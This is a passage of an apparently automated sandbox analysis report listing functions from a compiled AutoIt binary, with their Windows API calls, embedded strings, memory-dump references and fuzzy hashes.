                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C7DE1: _memmove.LIBCMT ref: 004C7E22
                                                                                                                        • Part of subcall function 0051AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0051AABC
                                                                                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00518E73
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassMessageNameSend_memmove
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 372448540-1403004172
                                                                                                                      • Opcode ID: f143c1bc0071b484bf1745aa68aa4633cf6d2cd135977b174d4fcd0b94373160
                                                                                                                      • Instruction ID: afd55b9e606be14516a87786197be79c044d9c84678793cb9daa3c7add17c973
                                                                                                                      • Opcode Fuzzy Hash: f143c1bc0071b484bf1745aa68aa4633cf6d2cd135977b174d4fcd0b94373160
                                                                                                                      • Instruction Fuzzy Hash: 640145B5601219AB9B14EBA0CC45DFE3B68BF46320F000A1EB836572D1DE351848D650
                                                                                                                      Function 00528D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __fread_nolock_memmove
                                                                                                                      • String ID: EA06
                                                                                                                      • API String ID: 1988441806-3962188686
                                                                                                                      • Opcode ID: a8b374f7d9f661327d49100f7e8854f598b36e2aff5a668abf4ada860a77dbae
                                                                                                                      • Instruction ID: a9c5a213a75a5ad724d3570c63f6a5fc1f40a9a983babc7cd8b88730956021a3
                                                                                                                      • Opcode Fuzzy Hash: a8b374f7d9f661327d49100f7e8854f598b36e2aff5a668abf4ada860a77dbae
                                                                                                                      • Instruction Fuzzy Hash: 8701F9729042587EDB18CAA9D816EFE7BF8DF11315F00459FF556D21C1E878A6088760
                                                                                                                      Function 00518CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C7DE1: _memmove.LIBCMT ref: 004C7E22
                                                                                                                        • Part of subcall function 0051AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0051AABC
                                                                                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00518D6B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassMessageNameSend_memmove
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 372448540-1403004172
                                                                                                                      • Opcode ID: f2f74b5f33c319890d9dd8ab07ceaa5f53d045ac70eaedb6c20bec7e7eb5bdbf
                                                                                                                      • Instruction ID: 436d494b19d884974f34c6ddbe9ee6a46e745b7a1a141631e0734d1326cb3d6a
                                                                                                                      • Opcode Fuzzy Hash: f2f74b5f33c319890d9dd8ab07ceaa5f53d045ac70eaedb6c20bec7e7eb5bdbf
                                                                                                                      • Instruction Fuzzy Hash: 5F01FCB5641109ABDB25E7E1D956FFE7BA8EF15340F10001E7806631D1DE245E48D671
                                                                                                                      Function 00518D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C7DE1: _memmove.LIBCMT ref: 004C7E22
                                                                                                                        • Part of subcall function 0051AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0051AABC
                                                                                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00518DEE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassMessageNameSend_memmove
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 372448540-1403004172
                                                                                                                      • Opcode ID: b4e2b00b1aaf444a75ac1ab2d3b62922d43b3332b483501b6e671f0ad7e053d9
                                                                                                                      • Instruction ID: d468df8adddf9ad0545be25fc18a5d71e372d7489443324e0c3eeac22792d18d
                                                                                                                      • Opcode Fuzzy Hash: b4e2b00b1aaf444a75ac1ab2d3b62922d43b3332b483501b6e671f0ad7e053d9
                                                                                                                      • Instruction Fuzzy Hash: ED0170B560110977DB21E7A4D941FFE7B5CEF15340F10001EB805731D1DD244E48D271
                                                                                                                      Function 0051C4EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0051C534
                                                                                                                        • Part of subcall function 0051C816: _memmove.LIBCMT ref: 0051C860
                                                                                                                        • Part of subcall function 0051C816: VariantInit.OLEAUT32(00000000), ref: 0051C882
                                                                                                                        • Part of subcall function 0051C816: VariantCopy.OLEAUT32(00000000,?), ref: 0051C88C
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0051C556
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$Init$ClearCopy_memmove
                                                                                                                      • String ID: d}W
                                                                                                                      • API String ID: 2932060187-3741415682
                                                                                                                      • Opcode ID: 52f025bf2b679b61426fb9c83c0f5087d7caedc38a044799c0404d28439d6b7c
                                                                                                                      • Instruction ID: 946abc3ba9b6eb2066da3066da4e79cb6a5799f1f637acd34f084a89bbc83255
                                                                                                                      • Opcode Fuzzy Hash: 52f025bf2b679b61426fb9c83c0f5087d7caedc38a044799c0404d28439d6b7c
                                                                                                                      • Instruction Fuzzy Hash: CA1100B19007089FC720DFAAD8849DAFBF8FF18314B50856FE58AD7611E771AA48CB54
                                                                                                                      Function 00524F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassName_wcscmp
                                                                                                                      • String ID: #32770
                                                                                                                      • API String ID: 2292705959-463685578
                                                                                                                      • Opcode ID: b97be7efd742900c622cf54f699466ce503a8fbda023732677c10d031faac4f2
                                                                                                                      • Instruction ID: 35f16a174f5f38af5723b935cf4f28133a0b1ca5d4c53d9ade449d9e0e091d01
                                                                                                                      • Opcode Fuzzy Hash: b97be7efd742900c622cf54f699466ce503a8fbda023732677c10d031faac4f2
                                                                                                                      • Instruction Fuzzy Hash: 08E0D13250023877D7109B59EC49FA7FBACEB55B71F000057FD04D3151D5649A458BE0
                                                                                                                      Function 004FB2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004FB314: _memset.LIBCMT ref: 004FB321
                                                                                                                        • Part of subcall function 004E0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,004FB2F0,?,?,?,004C100A), ref: 004E0945
                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,004C100A), ref: 004FB2F4
                                                                                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,004C100A), ref: 004FB303
                                                                                                                      Strings
                                                                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 004FB2FE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                      • API String ID: 3158253471-631824599
                                                                                                                      • Opcode ID: 11ed2c17a5f825bef706a921bbb8ff25538a1850a73b36231fb959d5db5ef72f
                                                                                                                      • Instruction ID: d509e87b0af0435622b3a0eb89d8c2cb10e7505b1daff2819bdfa100b4a46d4a
                                                                                                                      • Opcode Fuzzy Hash: 11ed2c17a5f825bef706a921bbb8ff25538a1850a73b36231fb959d5db5ef72f
                                                                                                                      • Instruction Fuzzy Hash: 13E06D78600B008BD7209F2AE8047527AE8FF1135CF01893EE856C7341EBB9D848CBA1
                                                                                                                      Function 00517C74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00517C82
                                                                                                                        • Part of subcall function 004E3358: _doexit.LIBCMT ref: 004E3362
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Message_doexit
                                                                                                                      • String ID: AutoIt$Error allocating memory.
                                                                                                                      • API String ID: 1993061046-4017498283
                                                                                                                      • Opcode ID: b7601ddbfd1efbd6e34c84579acc2e3f9c601d8e73f248f1279e904dd06611f3
                                                                                                                      • Instruction ID: 29175d56634e8aaba71852ea4a7a55f8665c9eb6a1f3806670759cef08bfcf06
                                                                                                                      • Opcode Fuzzy Hash: b7601ddbfd1efbd6e34c84579acc2e3f9c601d8e73f248f1279e904dd06611f3
                                                                                                                      • Instruction Fuzzy Hash: F0D0C2323C435832D10532AB7C0BFCA2D488B05B5BF00042BBF08594D389D6488052EC
                                                                                                                      Function 00501935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetSystemDirectoryW.KERNEL32(?), ref: 00501775
                                                                                                                        • Part of subcall function 0053BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0050195E,?), ref: 0053BFFE
                                                                                                                        • Part of subcall function 0053BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0053C010
                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0050196D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                                                      • String ID: WIN_XPe
                                                                                                                      • API String ID: 582185067-3257408948
                                                                                                                      • Opcode ID: c8645c9bcdfc0e6fe374ea599559283a1a1c106a85962833df45d920a1687208
                                                                                                                      • Instruction ID: b820bcddfd4270a2b63817636ac68321744eda74e3321f69ab740c636ae85397
                                                                                                                      • Opcode Fuzzy Hash: c8645c9bcdfc0e6fe374ea599559283a1a1c106a85962833df45d920a1687208
                                                                                                                      • Instruction Fuzzy Hash: 42F0C970800109DFDB15DB95CA88AECBBF8FB18305F541495E102A61A0D7759F89DF66
                                                                                                                      Function 00545964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0054596E
                                                                                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00545981
                                                                                                                        • Part of subcall function 00525244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 005252BC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                      • Opcode ID: 7cee453d752d368a0dbf3dc3a1ab733f37ec0a54e0244d5dce24e89e5d4a52de
                                                                                                                      • Instruction ID: 685e8e7e122e3bca82893382fc256e5b4475fe2cff448fd5f2064a548690178e
                                                                                                                      • Opcode Fuzzy Hash: 7cee453d752d368a0dbf3dc3a1ab733f37ec0a54e0244d5dce24e89e5d4a52de
                                                                                                                      • Instruction Fuzzy Hash: EED0C939794311B7E664AB74AC0FFE66A14BF51B54F010825B249AA1D0E9E0A804D754
                                                                                                                      Function 00545998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 005459AE
                                                                                                                      • PostMessageW.USER32(00000000), ref: 005459B5
                                                                                                                        • Part of subcall function 00525244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 005252BC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                      • Opcode ID: f51dc0dd3564371b601ef1cba30eb365abd6fcfd4569e52536aea33ccb4cf273
                                                                                                                      • Instruction ID: 4e057cf4017ee484e94bf992c7b7bcb8362d44d5de3bc327fb77bc2b7a1aeb15
                                                                                                                      • Opcode Fuzzy Hash: f51dc0dd3564371b601ef1cba30eb365abd6fcfd4569e52536aea33ccb4cf273
                                                                                                                      • Instruction Fuzzy Hash: C3D0C9357C0311BBE664AB74AC0FFD66A14BB56B54F010825B249AA1D0E9E0A804D754